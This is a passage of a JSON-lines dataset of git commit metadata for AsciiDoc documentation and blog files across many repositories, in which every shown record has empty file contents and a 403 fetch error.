2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbb92c65c253183fdc4b3c3869af79211d2046f8","subject":"Update 2019-03-12-A-B.adoc","message":"Update 
2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b7b4d9f01c943d4035dbb82b9c30954d5d00f90","subject":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5aed548cccb8bfb263c0b2691111d4e498ff5198","subject":"Publish DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","message":"Publish DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","new_file":"DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf52a616456497eec94048f1de6204124e20d7a7","subject":"[release] Announcement of Debezium 0.10.0.Beta3","message":"[release] Announcement of Debezium 0.10.0.Beta3\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-07-25-debezium-0-10-0-beta3-released.adoc","new_file":"blog\/2019-07-25-debezium-0-10-0-beta3-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f5d57791fbc3bc07bd10ca11051cc7af742439d","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b035d4986ab54f20d119a069449a2325d6cd2d54","subject":"Update 2016-7-19-and.adoc","message":"Update 2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-19-and.adoc","new_file":"_posts\/2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cfa7065a55c56633a6a2f5b70c3238031f0dea9","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41b666f8321699130beaaf1f93bcd90d5379b0dc","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0b5771a1586c5e38a05634724615cf20d9be163","subject":"Update 2017-05-05-Jigsaw-rererere-fait-parler-de-lui.adoc","message":"Update 2017-05-05-Jigsaw-rererere-fait-parler-de-lui.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-05-05-Jigsaw-rererere-fait-parler-de-lui.adoc","new_file":"_posts\/2017-05-05-Jigsaw-rererere-fait-parler-de-lui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b90483bbd7b2ab6d42a339fec694479da5262cd6","subject":"Update 2016-X-X-X-X-Using-Geppetto-and-J-Ruby-to-create-Puppet-module.adoc","message":"Update 2016-X-X-X-X-Using-Geppetto-and-J-Ruby-to-create-Puppet-module.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2016-X-X-X-X-Using-Geppetto-and-J-Ruby-to-create-Puppet-module.adoc","new_file":"_posts\/2016-X-X-X-X-Using-Geppetto-and-J-Ruby-to-create-Puppet-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c661c459e74e5fbed44c516046d30690b4b5ac4","subject":"Import CIP2013-09-06","message":"Import CIP2013-09-06\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2013-09-06.asciidoc","new_file":"cip\/CIP2013-09-06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f2b939607100a685afb7ccb5c2f4885b11b1d40","subject":"Started Datastore ref doc with 
current features (#949)","message":"Started Datastore ref doc with current features (#949)\n\n* Started Datastore ref doc with current features\r\n\r\n* typo\r\n\r\n* pr comments\r\n\r\n* pr comments\r\n","repos":"spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"spring-cloud-gcp-docs\/src\/main\/asciidoc\/datastore.adoc","new_file":"spring-cloud-gcp-docs\/src\/main\/asciidoc\/datastore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80669e467f28604f4b630a56516e065814337014","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/managers_and_pms.adoc","new_file":"content\/writings\/managers_and_pms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3d680d23e4e9fcf8fe962343744e7fa08ddaa25f","subject":"Update 2015-5-10-uGUI.adoc","message":"Update 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-5-10-uGUI.adoc","new_file":"_posts\/2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa0398f45f9a527737b09c6fcc0a262a6ba711b6","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"472c2b075dac2471a027d06640b57ded8c70781a","subject":"Regen full","message":"Regen 
full\n","repos":"apache\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,nikhilvibhav\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,tdiesler\/camel,tadayosi\/camel,apache\/camel,apache\/camel,adessaigne\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,adessaigne\/camel,nikhilvibhav\/camel,pax95\/camel,nikhilvibhav\/camel,pax95\/camel,christophd\/camel,apache\/camel,tdiesler\/camel,tadayosi\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,tdiesler\/camel,nikhilvibhav\/camel,pax95\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,pax95\/camel","old_file":"catalog\/camel-catalog\/src\/generated\/resources\/org\/apache\/camel\/catalog\/docs\/yaml-dsl.adoc","new_file":"catalog\/camel-catalog\/src\/generated\/resources\/org\/apache\/camel\/catalog\/docs\/yaml-dsl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"696836c6db910630a8cf550758e30ff580e0183d","subject":"y2b create post Galaxy S4 vs iPhone 5 vs Nexus 4","message":"y2b create post Galaxy S4 vs iPhone 5 vs Nexus 4","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-14-Galaxy-S4-vs-iPhone-5-vs-Nexus-4.adoc","new_file":"_posts\/2013-03-14-Galaxy-S4-vs-iPhone-5-vs-Nexus-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb9c457c349100aa4d3bbfe2907f63438b18dce6","subject":"Added basic running instructions","message":"Added basic running instructions\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"RUNNING.adoc","new_file":"RUNNING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab400edf380626da7a3f1eba64e294cafb214626","subject":"Motivation for monad transformers","message":"Motivation for monad transformers\n","repos":"tcsavage\/cats,mccraigmccraig\/cats,funcool\/cats,alesguzik\/cats,OlegTheCat\/cats,yurrriq\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c52d0d3ba6fa5bef3d1369c09f87e32c010566dc","subject":"Update 2018-05-01-Shakespeare-be-my-love-en-el-Auditorio-de-La-Alberca-Murcia.adoc","message":"Update 2018-05-01-Shakespeare-be-my-love-en-el-Auditorio-de-La-Alberca-Murcia.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2018-05-01-Shakespeare-be-my-love-en-el-Auditorio-de-La-Alberca-Murcia.adoc","new_file":"_posts\/2018-05-01-Shakespeare-be-my-love-en-el-Auditorio-de-La-Alberca-Murcia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff8648f4cd4eb365908a4a3d05e155d36f32ebc8","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a89299c06a8d47453cf7042e6a8614260a78ca23","subject":"Update 2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c2591130ee41193aed6374af4d46ba91b5614e","subject":"Update 2018-09-15-Hack-The-Box-Stratosphere.adoc","message":"Update 2018-09-15-Hack-The-Box-Stratosphere.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2018-09-15-Hack-The-Box-Stratosphere.adoc","new_file":"_posts\/2018-09-15-Hack-The-Box-Stratosphere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be976a66407045c11432c8644995c68b1a78cac1","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/dtfabric,libyal\/dtfabric","old_file":"documentation\/Data types fabric (dtFabric) format.asciidoc","new_file":"documentation\/Data types fabric (dtFabric) format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtfabric.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f2cec945bc54a485b92b8b1bd75cda75f17085cc","subject":"Update readme.asciidoc","message":"Update readme.asciidoc\n\nlegal\/license note","repos":"brechin\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lillian-lemmer\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64553739c711af506df6503a767331bb6c6f98a1","subject":"Add news\/2018-05-07-forge-3.9.0.final.asciidoc","message":"Add 
news\/2018-05-07-forge-3.9.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2018-05-07-forge-3.9.0.final.asciidoc","new_file":"news\/2018-05-07-forge-3.9.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2d3d91f203b68fc38e3f9fa4e2d51e9fad14bf84","subject":"new blog","message":"new blog\n","repos":"tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/01\/21\/hawkular-command-gateway-clients.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/01\/21\/hawkular-command-gateway-clients.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cd2566d5d24d0874de41df35f7f6d8b5ab934219","subject":"Started on roadmap doc","message":"Started on roadmap doc\n","repos":"fhaynes\/iridium,fhaynes\/iridium","old_file":"docs\/roadmap.adoc","new_file":"docs\/roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhaynes\/iridium.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddba77f84e22a77b1ab7c553da7b41d07d89fa86","subject":"Document code rules.","message":"Document code rules.\n","repos":"tourea\/docker-java,gesellix\/docker-java,ollie314\/docker-java,tejksat\/docker-java,docker-java\/docker-java,tourea\/docker-java,magnayn\/docker-java,llamahunter\/docker-java,ollie314\/docker-java,docker-java\/docker-java,llamahunter\/docker-java,tejksat\/docker-java,magnayn\/docker-java,gesellix\/docker-java","old_file":"docs\/devel.adoc","new_file":"docs\/devel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docker-java\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed09c968a3598236e3a71b86aa7d9a7fe40b36d8","subject":"tuned based on feedback from Serge","message":"tuned based on feedback from Serge\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"7353806775ece8a8926e97ad83ea5b2433d4a8cd","subject":"Update 2017-05-31-TWCTF-2017.adoc","message":"Update 2017-05-31-TWCTF-2017.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fdf0029d57bee77780dc837f5245a7c9e9e4b15","subject":"Update 2018-10-09-Azure-Devops-Pipelines-unlink-from-your-github-account.adoc","message":"Update 2018-10-09-Azure-Devops-Pipelines-unlink-from-your-github-account.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2018-10-09-Azure-Devops-Pipelines-unlink-from-your-github-account.adoc","new_file":"_posts\/2018-10-09-Azure-Devops-Pipelines-unlink-from-your-github-account.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d053a5c43d78ef7a00bc9b9729f9d0321366af8","subject":"Adds the STARTS WITH and ENDS WITH CIP","message":"Adds the STARTS WITH and ENDS WITH CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2015-09-15-STARTS-WITH-and-ENDS-WITH.adoc","new_file":"cip\/CIP2015-09-15-STARTS-WITH-and-ENDS-WITH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49f906643ff2df85685f59ce094b1677e00f9041","subject":"archives news of July 2014","message":"archives news of July 2014\n","repos":"llaville\/asciidoc-bootstrap-backend,llaville\/asciidoc-bootstrap-backend","old_file":"blog\/201407.asciidoc","new_file":"blog\/201407.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/llaville\/asciidoc-bootstrap-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e179c15587b3e2369279d98ed3e2c78f8c61949","subject":"Added Camel 2.19.0 release notes to docs","message":"Added Camel 2.19.0 release notes to 
docs\n","repos":"gnodet\/camel,adessaigne\/camel,davidkarlsen\/camel,alvinkwekel\/camel,CodeSmell\/camel,apache\/camel,DariusX\/camel,mcollovati\/camel,sverkera\/camel,objectiser\/camel,mcollovati\/camel,ullgren\/camel,zregvart\/camel,tadayosi\/camel,sverkera\/camel,pmoerenhout\/camel,nicolaferraro\/camel,adessaigne\/camel,pax95\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,jamesnetherton\/camel,anoordover\/camel,onders86\/camel,alvinkwekel\/camel,Fabryprog\/camel,tdiesler\/camel,pax95\/camel,davidkarlsen\/camel,anoordover\/camel,punkhorn\/camel-upstream,objectiser\/camel,nicolaferraro\/camel,objectiser\/camel,mcollovati\/camel,adessaigne\/camel,anoordover\/camel,kevinearls\/camel,tdiesler\/camel,cunningt\/camel,apache\/camel,onders86\/camel,gnodet\/camel,christophd\/camel,pmoerenhout\/camel,christophd\/camel,tadayosi\/camel,DariusX\/camel,cunningt\/camel,jamesnetherton\/camel,anoordover\/camel,pax95\/camel,ullgren\/camel,tadayosi\/camel,tadayosi\/camel,Fabryprog\/camel,pax95\/camel,adessaigne\/camel,cunningt\/camel,christophd\/camel,DariusX\/camel,apache\/camel,jamesnetherton\/camel,apache\/camel,anoordover\/camel,tdiesler\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,pax95\/camel,onders86\/camel,Fabryprog\/camel,tdiesler\/camel,tadayosi\/camel,nicolaferraro\/camel,pmoerenhout\/camel,gnodet\/camel,cunningt\/camel,cunningt\/camel,pmoerenhout\/camel,Fabryprog\/camel,sverkera\/camel,cunningt\/camel,christophd\/camel,sverkera\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,jamesnetherton\/camel,kevinearls\/camel,kevinearls\/camel,davidkarlsen\/camel,alvinkwekel\/camel,tdiesler\/camel,gnodet\/camel,anoordover\/camel,kevinearls\/camel,davidkarlsen\/camel,ullgren\/camel,CodeSmell\/camel,sverkera\/camel,adessaigne\/camel,nikhilvibhav\/camel,gnodet\/camel,punkhorn\/camel-upstream,adessaigne\/camel,jamesnetherton\/camel,sverkera\/camel,onders86\/camel,punkhorn\/camel-upstream,tadayosi\/camel,pmoerenhout\/camel,CodeSmell\/camel,CodeSmell\/camel,ullgren\/camel,christophd\/camel,pmoerenhout\/camel,objectiser\/camel,apache\/camel,kevinearls\/camel,christophd\/camel,jamesnetherton\/camel,kevinearls\/camel,onders86\/camel,DariusX\/camel,apache\/camel,mcollovati\/camel,punkhorn\/camel-upstream,pax95\/camel,zregvart\/camel,onders86\/camel,zregvart\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2190-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2190-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7551a8cd52bd1ceaf698c447e19430de368e915f","subject":"Update 2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","message":"Update 2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","new_file":"_posts\/2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f3cd1b8ffbe78014c2789cfab6f4cf4cf849910","subject":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","message":"Update 
2016-12-16-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de8416ff727f7421afb50d81a86711ab4a6e844a","subject":"Lazy configuration user guide chapter","message":"Lazy configuration user guide chapter\n","repos":"robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,lsmaira\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,lsmaira\/gradle,lsmaira\/gradle,lsmaira\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,lsmaira\/gradle,gradle\/gradle,lsmaira\/gradle,blindpirate\/gradle,gradle\/gradle,lsmaira\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,lsmaira\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,lsmaira\/gradle,blindpirate\/gradle,lsmaira\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/lazyConfiguration.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/lazyConfiguration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robinverduijn\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d7e8425e765cca7e624ed020c98be1ee9094ff47","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 